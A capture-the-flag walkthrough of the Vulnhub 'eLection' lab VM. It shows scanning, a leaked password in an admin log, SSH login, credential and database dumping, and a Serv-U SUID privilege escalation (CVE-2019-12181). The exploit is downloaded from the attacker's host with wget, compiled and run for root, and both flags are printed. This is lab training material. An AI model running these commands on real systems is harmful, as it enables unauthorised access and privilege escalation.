Vulnhub: eLection

This is a beginner-level VM, pretty standard.

Initial Scan:

Nmap scan report ​ for​ 192.168.56.104
Host is up (0.00017s latency).
Not​ shown: 998 closed ports
PORT ​ STATE​ SERVICE
22/tcp open ssh
80/tcp open http

More thorough scan:

crazyeights@es-base:~$​ nmap -A -p- ​192.168.56.104
Starting Nmap ​ 7.80​ ( ​ https:​ //nmap.org ) at 2020-07-24 17:45 EDT
Nmap scan report ​ for​ ​ 192.168.56.104
Host is up (​ 0.000099​ s latency).
Not ​ shown:​ ​ 65533​ closed ports
PORT
STATE SERVICE VERSION
22​ /tcp open ssh OpenSSH ​ 7.6​p1 Ubuntu ​ 4ubuntu0​.3​ (Ubuntu Linux; protocol 2.0​)
80​ /tcp open http Apache httpd ​ 2.4.29​ ((Ubuntu))
|_http-server-​ header:​ Apache/​ 2.4.29​ (Ubuntu)
|_http-​ title:​ Apache2 Ubuntu Default ​ Page:​ It works
Service ​ Info:​ ​ OS:​ Linux; ​ CPE:​ ​ cpe:​ / ​ o:linux:​ linux_kernel

Web:

Checked Index.

Ran nikto to check server for configuration:

crazyeights@es-base:~$​ nikto -h http://192.168.56.104
[SNIP]
+ /phpmyadmin/: phpMyAdmin ​directory​ ​found

Went to phpmyadmin, checked default credentials

Enumeration
crazyeights@es-base:~$​ dirb ​ http:​ //192.168.56.104
---- Scanning ​ URL:​ ​ http:​ //192.168.56.104/ ----
+ ​ http:​ //192.168.56.104/index.html (CODE:200|SIZE:10918)
==> ​ DIRECTORY:​ ​ http:​ //192.168.56.104/javascript/
+ ​ http:​ //192.168.56.104/phpinfo.php (CODE:200|SIZE:95517)
==> ​ DIRECTORY:​ ​ http:​ //192.168.56.104/phpmyadmin/
+ ​ http:​ //192.168.56.104/robots.txt (CODE:200|SIZE:30)
+ ​ http:​ //192.168.56.104/server-status (CODE:403|SIZE:279)
Checking robots.txt:

Contains folders:

  • admin

  • wordpress

  • user

  • election

Checked admin/, wordpress/, and user/ - got 404 for all

Checking election:

election directory does not give 404, rerunning dirb from election:

crazyeights@es-base:~$ dirb http://192.168.56.104/election

GENERATED WORDS: 4612

---- Scanning ​ URL:​ ​ http:​//192.168.56.104/election/ ----
=​=> DIRECTORY: http://192.168.56.104/election/admin/
==> ​ DIRECTORY:​ ​ http:​//192.168.56.104/election/data/
+ http://192.168.56.104/election/index.php (CODE:200|SIZE:7003)
==> ​ DIRECTORY:​ ​ http:​//192.168.56.104/election/js/
==> ​ DIRECTORY:​ ​ http:​//192.168.56.104/election/languages/
==> ​ DIRECTORY:​ ​ http:​//192.168.56.104/election/lib/
==> ​ DIRECTORY:​ ​ http:​//192.168.56.104/election/media/
==> ​ DIRECTORY:​ ​ http:​//192.168.56.104/election/themes/

---- Entering ​ directory:​ ​ http:​//192.168.56.104/election/admin/​ ----
==> ​ DIRECTORY:​ ​ http:​//192.168.56.104/election/admin/ajax/
=​=> DIRECTORY: http://192.168.56.104/election/admin/components/
=​=> DIRECTORY: http://192.168.56.104/election/admin/css/
=​=> DIRECTORY: http://192.168.56.104/election/admin/img/
=​=> DIRECTORY: http://192.168.56.104/election/admin/inc/
+ http://192.168.56.104/election/admin/index.php (CODE:200|SIZE:8964)
=​=> DIRECTORY: http://192.168.56.104/election/admin/logs/
[SNIP]

Checked election/admin: Dead End.

Checking the admin logs:
http:​ //192.168.56.104/election/admin/logs/

File system.log
Contents:
[​2020-01-01 00:00:00​] Assigned Password​ for​ the user love: P@$$w0rd@​123
[​2020-04-03 00:13:53​] Love added candidate​ 'Love'​ .
[​2020-04-08 19:26:34​] Love has been logged ​in​​ from​ Unknown IP ​on​ ​Firefox (Linux).

User

Tried credentials with SSH.

crazyeights​@es​-base:​~$ ssh love​@192​.168.56​.104

Finding user flag:

love@election:~$​ ls -R
.:
Desktop Documents Downloads Videos Music Pictures Public Templates

./​ Desktop:
user.txt

love@election:~$​ ​ cat Desktop/user.txt
cd38ac698c0d793a5236d01003f692b​ 0

Root:

Tried:

  • sudo -l

  • find / -perm u=s 2>/dev/null

love@election:~$​ ​ id
uid=​1000​(love) gid=​1000​(love)
groups=​1000​(love),​4(adm),​24​(cdrom),​30​(dip),​33​(www-data),​46​(plugdev),​116(lpadmin),​ 126​(sambashare)

love@election:~$​ ​lsb_release -a
No LSB modules are available.
Distributor ​ ID: Ubuntu
Description: Ubuntu ​18.04​.4 ​LTS
Release: 18.04
Codename: bionic

love@election:~$ ​ find / -group adm -type f ​ 2>/dev/null

Checking database connections for passwords:

love@election:/$​ cat /​var​/www/​html​/election/​admin​/inc/​conn.php

$db_host​ = ​ "localhost"​ ;
$db_user​ = ​ "newuser"​ ;
$db_pass​ = ​ "password"​ ;
$db_name​ = ​ "election"​ ;

On the host login to mysql:

love@election:/etc/mysql$​ mysql -u newuser -p'password' -h localhost -D election
MariaDB [election]> show;
+---------------------+
| Database            |
+---------------------+
| election            |
| information​ _schema |
| mysql               |
| performance_​ schema |
+---------------------+
4 rows in set (0.00 sec)

MariaDB [election]> use mysql;
Database changed
MariaDB [mysql]> show tables;
MariaDB [mysql]> select * from user;

In table:

| localhost | root | *9CFBBC772F3F6C106020035386DA5BBBF1249A11 | Y

Google it: 9CFBBC772F3F6C106020035386DA5BBBF1249A11​ :toor

love@election:/etc/mysql$ su root
Password:
su: Authentication failure

Not the root password.

love@election:~$​ ​ find / -group www-data -type f ​ 2>/dev/null
There is file /var/www/.bash_history
love@election:~$ ​ cat /var/www/.bash_history
...

Is a dead-end

The correct path:

love@election:~$​ ​find​ ​/ -perm /​4000​ ​2>/dev/​null
....
/usr/​local​/Serv-U/​Serv-U

Serv-U Privilege Escalation:

Using CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation

https://www.exploit-db.com/exploits/47009

The server version information is in Serv-U-StartupLog.txt

love@election:/usr/local/Serv-U$ ​cat Serv-U-StartupLog.txt
[​01​] Sat ​25​ Jul 2​0 ​03​:12​:49​ - Serv-U File Server (​64​ -bit) - Version ​15.1
(​15.1​.6.25​) - (C) ​ 2017​ SolarWinds Worldwide, LLC. All rights reserved.

Download the exploit:


love@election:~$​ wget ​http:​//192.168.56.1/​47009​.c

Compile and run the exploit:

love@election:~$​ gcc -o pe ​47009​.c
love@election:~$ ​ ./pe
uid=​0 ​(root) gid=​0 ​(root)
groups=​0​(root),​ 4​(adm),​ 24​(cdrom),​ 30​(dip),​ 33​(www-data),​ 46​(plugdev),​ 116​(lpadmin),​ 126​(sambashare),​ 1000​(love)
opening root shell
# cd /root
# ls
root.txt
# cat root.txt
5238​feefc4ffe09645d97e9ee49bc3a6

FIN.